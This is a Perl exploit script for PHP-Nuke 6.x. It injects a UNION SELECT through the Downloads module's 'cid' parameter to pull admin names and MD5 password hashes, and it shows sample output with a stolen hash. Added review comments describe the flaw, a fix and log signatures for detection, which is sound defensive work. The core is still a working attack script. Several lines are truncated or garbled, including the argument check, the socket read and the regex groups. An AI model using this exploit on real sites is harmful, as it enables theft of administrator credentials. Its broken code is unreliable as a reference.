PHP-NUKE version

    
 
#!/usr/bin/perl -w
                              use IO::Socket;

                              ########################################
                              ## THIS CODE PUBLIC NOW  =)))        ##
                              ########################################
                              ## __________               ___ ___   ##
                              ## \______   \__ __  ______/   |   \  ##
                              ##  |       _/  |  \/  ___/    _    \ ##
                              ##  |    |   \  |  /\___ \\         / ##
                              ##  |____|_  /____//____  >\___|_  /  ##
                              ##         \/           \/       \/   ##
                              ########################################
                              ## based on 'cid' sql injection vuln
                              ## in Download module, more info about
                              ## this vuln u can see here:
                              ## http://rst.void.ru/texts/advisory10.htm
                              ########################################
                              ## work only on mysql version > 4.0
                              ########################################
                              ## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
                              ## C:\>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
                              ##
                              ## server : 127.0.0.1
                              ## folder : /phpnuke/
                              ## aid    : admin
                              ##
                              ## [~] prepare to connect...
                              ## [+] connected
                              ## [~] prepare to send data...
                              ## [+] success
                              ## [~] wait for reply...
                              ## [+] w00t...
                              ## [+] USER: admin
                              ## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
                              ##
                              ########################################

                              # Argument-count check and usage banner.
                              # NOTE(review): this line and the usage strings below are truncated in
                              # this copy of the listing (text that looked like markup appears to have
                              # been stripped), so the script does not parse as shown. Left as found.
                              if (@ARGV  /> \n";
                              print "\n";
                              print "  - host for attack\n";
                              print " /> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )\n";
                              print "  - user aid , nick ( admin , blabla )\n";
                              print "#############################################################";
                              exit();
                              }

                              # Positional arguments: target host, PHP-Nuke base path, and the
                              # author id (aid) to look for in the reply.
                              $server = $ARGV[0];
                              $folder = $ARGV[1];
                              $aid = $ARGV[2];

                              print "\n";
                              print "server : $server\n";
                              print "folder : $folder\n";
                              print "aid    : $aid\n";
                              print "\n";
                              $success = 0;
                              # Request path for the Downloads module (d_op=viewdownload). The cid
                              # parameter is followed by a URL-encoded UNION SELECT of counter, aid
                              # and pwd from nuke_authors, ending in a SQL comment marker.
                              # Root cause (per the header): cid is a SQL injection point in the
                              # Download module. Presumably the module places cid into its query
                              # without validation -- confirm against the advisory. The fix is to
                              # accept cid only as an integer and to bind it as a query parameter.
                              # Detection: web-server log entries for modules.php?name=Downloads whose
                              # cid value contains "UNION", "select" or "nuke_authors".
                              # NOTE(review): the literal is split across two lines in this copy, so
                              # the value contains a line break and indentation; this may be a
                              # page-wrapping artifact.
                              $path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20
                              UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
                              $GET = $folder . $path_download;
                              print "[~] prepare to connect...\n";
                              # Plain TCP connection to port 80 of the target; the script dies if
                              # the connect fails.
                              $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || 
                              die "[-] connect failed\n";
                              print "[+] connected\n";
                              print "[~] prepare to send data...\n";
                              # Hand-written HTTP/1.1 request. Fixed strings usable as log/IDS
                              # signatures for this script: header lines end in a bare "\n" rather
                              # than CRLF, the referrer is sent under the non-standard name
                              # "Http-Referer", and the User-Agent is the literal
                              # "Internet Explorer 6.0".
                              print $socket "GET $GET HTTP/1.1\n";
                              print $socket "Host: $server\n";
                              print $socket "Accept: */*\n";
                              print $socket "Http-Referer: http://microsoft.com\n";
                              print $socket "User-Agent: Internet Explorer 6.0\n";
                              print $socket "Pragma: no-cache\n";
                              print $socket "Cache-Control: no-cache\n";
                              print $socket "Connection: close\n\n";
                              # "success" is printed unconditionally; the results of the socket
                              # writes above are not checked.
                              print "[+] success\n";
                              print "[~] wait for reply...\n";
                              # Scan the reply for the requested aid followed by a 32-character field.
                              # NOTE(review): the read expression of the loop and parts of the pattern
                              # are missing in this copy (several capture groups are empty), so the
                              # $1/$6 references below do not line up with the groups as shown.
                              # Left as found.
                              # $aid is interpolated into the pattern without quotemeta, so regex
                              # metacharacters in the third argument change the match.
                              while ($answer = )
                              {
                              #print "$answer";
                              if ($answer=~/(&cid=)(\w)(\">)($aid)()(.{0,20})
                              ()(.{32})()/)
                              {
                              $success = 1;
                              print "[+] w00t...\n";
                              # The 32-character value is reported as the author's MD5 password hash.
                              # For incident response, a hash exposed this way is a compromised
                              # credential: reset the affected admin password.
                              print "[+] USER: $1 \n[+] MD5 HASH: $6\n";
                              }
                              }
                              # No matching line in the whole reply: report failure.
                              if ($success == 0) { print "[-] exploit failed =(\n"; }
                              
                              
